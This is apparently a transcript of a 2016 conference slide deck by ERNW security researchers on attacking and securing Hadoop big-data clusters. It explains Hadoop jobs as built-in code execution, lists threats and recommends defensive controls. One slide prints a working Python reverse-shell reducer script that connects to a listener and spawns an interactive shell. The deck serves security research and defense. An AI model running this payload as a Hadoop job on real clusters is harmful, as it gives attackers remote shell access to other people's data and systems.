Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for...
Transcript of Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for...
www.ernw.de
Attacking & Protecting Big Data Environments
Birk Kauer & Matthias Luft{bkauer, mluft}@ernw.de
17.03.16
www.ernw.de
#WhoAreWe¬ Birk Kauer
- Security Researcher @ERNW- Mainly Exploit Developer
¬ Matthias Luft- Security Researcher & Managing Director @ERNW
Research- Mainly managing too much
@lod108@uchi_mata
17.03.16 #2
www.ernw.de17.03.16 #3
www.ernw.de
Agenda¬ Current State – we need Big Data!¬ Hadoop Overview¬ Attacking Hadoop¬ Protecting Your Data in the Lake¬ Conclusions
17.03.16 #4
www.ernw.de
Big Data?¬ Buzzword!¬ How does it work?¬ Lets have a closer look at Hadoop
17.03.16 #5
www.ernw.de
Current State of the Industry ¬ Betsy Burton, Gartner:
“But what’s happening is that big data has quickly moved over the Peak
of Inflated Expectations,” she continues, “…and has become
prevalent in our lives across many hype cycles. So big data has become
a part of many hype cycles.”
17.03.16 #6
www.ernw.de
Current State of the Industry ¬ “We need a big data cluster in three
months!”- All corporate environments
¬ “Wrapping up, Bodkin noted that many companies are still trying to get their footing on how a data lake can help them.”- http://data-informed.com/data-lakes-
receive-mixed-reception-at-hadoop-summit/
17.03.16 #7
www.ernw.de
History¬ Indexing the whole WWW¬ First release 2007¬ Current release 2.6.4¬ Enterprise Distributions:
- Cloudera (CDH 5.5.2)- Hortonworks (HDP 2.3.4)
17.03.16 #8
www.ernw.de
FunctionalitySELECT age, AVG(contacts)FROM social.personGROUP BY ageORDER BY age
17.03.16 #9Source: Wikipedia
www.ernw.de
Functionalityfunction Map is input:
integer K1 between 1 and 1100, representing a batch
of 1 million social.person records for each social.person record in the K1
batchdo
let Y be the person's agelet N be the number of
contacts the person has produce one output record (Y,(N,1))
repeatend function17.03.16 #10Source: Wikipedia
www.ernw.de
Functionalityfunction Reduce is input:
age (in years) Yfor each input record (Y,(N,C))do
Accumulate in S the sum of N*C Accumulate in Cnew the sum of C
repeatlet A be S/Cnewproduce one output record (Y,(A,Cnew))
end function
17.03.16 #11Source: Wikipedia
www.ernw.de
Use Cases¬ Artificial intelligence
- Upcoming flaws- Analysis of behavior
¬ Displaying Data in real-time¬ Analyzing People
- Facebook- Insurance
17.03.16 #12
www.ernw.de
Hadoop Ecosystem
17.03.16 #13
www.ernw.de
Ambari
17.03.16 #14
www.ernw.de
MapReduceDoing the Job
17.03.16 #15
www.ernw.de
YarnRessourceManager
17.03.16 #16
www.ernw.de
HueShell as a Job? ... cool
17.03.16 #17
www.ernw.de
Ranger
17.03.16 #18
www.ernw.de
Definitions¬ Default Cluster (No Security)¬ Secure Cluster (Full Security)
17.03.16 #19
www.ernw.de
HDFS (Hadoop Distributed File System)
17.03.16 #20
www.ernw.de
Structure & Data Movement
Data
Request
17.03.16 #21
www.ernw.de
File SystemOn a single Node
17.03.16 #22
www.ernw.de
Hadoop speaks¬ RPC over TCP
- e.g. heartbeat, resource monitoring¬ HTTP
- e.g. Managing Jobs via web services- e.g. Web applications
17.03.16 #23
www.ernw.de
RPC
17.03.16 #24
www.ernw.de
Netstat Cluster
17.03.16 #25
www.ernw.de
JobsJava
JobJar
MapperReducer
Container
17.03.16 #26
www.ernw.de
“Container“
17.03.16 #27
www.ernw.de
How Jobs lookMapper
17.03.16 #28
public static class TokenizerMapperextends Mapper<Object, Text, Text, IntWritable>{
private final static IntWritable one = newIntWritable(1);
private Text word = new Text();
public void map(Object key, Text value, Contextcontext
) throws IOException, InterruptedException {StringTokenizer itr = new
StringTokenizer(value.toString());while (itr.hasMoreTokens()) {word.set(itr.nextToken());context.write(word, one);
}}
}
www.ernw.de
CEaaS (Code-Execution as a Service)Reducer
17.03.16 #29
public static class IntSumReducerextends
Reducer<Text,IntWritable,Text,IntWritable> {private IntWritable result = new
IntWritable();
public void reduce(Text ey, Iterable<IntWritable> values,
Context context) throws IOException,
InterruptedException {int sum = 0;for (IntWritable val : values) {sum += val.get();
}result.set(sum);context.write(key, result);
}}
www.ernw.de
Wait... Code Execution as a Service?
17.03.16 #30
www.ernw.de
Relevant Threats ¬ Unauthorized access to cluster data- … via job breakout.- ... via remote compromise.- ... via eavesdropping.
¬ Resource abuse- Password Cracker- Bitcoin Mining
¬ DoS of the Cluster- DDoS the Master Server or Namenodes- Slowing down the Cluster via spamming
files
17.03.16 #31
www.ernw.de
ShellCommandExecutor
17.03.16 #32
www.ernw.de
Attacking Hadoop¬ Easy -> Code Execution by Design¬ But Java Reverse Shell Container
gets killed when allocated Socket is waiting.
¬ => Hadoop Streaming Library
17.03.16 #33
www.ernw.de
Getting Stable Shellmapper.py
17.03.16 #34
www.ernw.de
Getting Stable Shellreducer.py
17.03.16 #35
#!/usr/bin/env pythonimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.62.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
www.ernw.de
Don´t DDoS yourself
17.03.16 #36
www.ernw.de
Demo
17.03.16 #37
www.ernw.de
Securing Hadoop¬ How do you secure an application
environment designed to execute code?
“WithGreatPowerComesGreatResponsibility”However,somewhatattributedtoVoltaire
17.03.16 #38
www.ernw.de
Recommended Controls¬ Secure Mode/Hadoop Security¬ Encryption of Network Traffic¬ Network Isolation¬ Monitoring¬ Node Hardening¬ Secure Job Development¬ Security Assessment¬ Patch and Vulnerability Management
17.03.16 #39
www.ernw.de
Recommended Controls¬ Secure Mode/Hadoop Security¬ Encryption of Network Traffic¬ Network Isolation¬ Monitoring¬ Node Hardening¬ Secure Job Development¬ Security Assessment¬ Patch and Vulnerability Management
17.03.16 #40
www.ernw.de
Secure Mode
17.03.16 #41
www.ernw.de
Secure Mode¬ Enables authentication, transport
encryption and least privilege.¬ Every user/job gets an individual
user ID assigned.¬ Relies heavily on Kerberos.
17.03.16 #42
www.ernw.de
Encryption of Network Traffic
¬ The following network communication methods exist in Hadoop environments:- Hadoop web interfaces/services- Hadoop RPC- Non-Hadoop web interfaces/services
¬ Encryption is possible for all of them.
17.03.16 #43
www.ernw.de
Monitoring¬ Jobs with the following
characteristics might be relevant:- Extensive network activity- Non-HDFS file system access- Run time & load
¬ Identified problems:- Limited log verbosity- Unclear breakout characteristics
17.03.16 #44
www.ernw.de
Demo
17.03.16 #45
www.ernw.de
Node Hardening ¬ Ensure keytab security¬ Follow your OS hardening guides¬ Points for discussion:
- Kernel Hardening (GrSecurity/SELinux)- Removing Compilers
17.03.16 #46
www.ernw.de
Isolation ¬ Virtualization?- According to Hadoop Ops people, horrible
for performance¬ Linux Containers (e.g. LXC)?
- Supported by Hadoop job schedulers, but only without secure mode (see next slide)
¬ Network Isolation- Only expose gateway nodes to the public- Security benefit when you can execute
code “on the inside”?
17.03.16 #47
www.ernw.de
Secure Job Development¬ A Hadoop job is also an application.¬ Do you know whether the input
data is trusted?¬ => Secure Job Development
guidelines are needed.
17.03.16 #48
www.ernw.de
Work in Progress¬ Detect breakouts/anomalies via log
monitoring¬ Long-term PAX experience as for
stability¬ Writing more malicious code to
spread awareness
17.03.16 #49
www.ernw.de
Conclusion ¬ Hadoop can be run in a (sufficiently) secure way.- … if the controls/hardening mentioned
are implemented¬ Code execution is always risky
- … and cannot be completely contained.¬ Be aware what input data you are
crunching.¬ Everyone needs to understand the
impact of intrinsic code execution.
17.03.16 #50
www.ernw.de
There’s never enough time…
THANKYOU… ...foryours!
@lod108@uchi_mata
Code & Slides:https://www.insinuator.net(..soon)
[email protected]@ernw.de
17.03.16 #51
www.ernw.de
Questions
17.03.16 #52
www.ernw.de
www.TROOPERS.de
17.03.16 #53
www.ernw.de
DisclaimerAll products, company names, brand names, trademarks and logos are the property of their respective owners!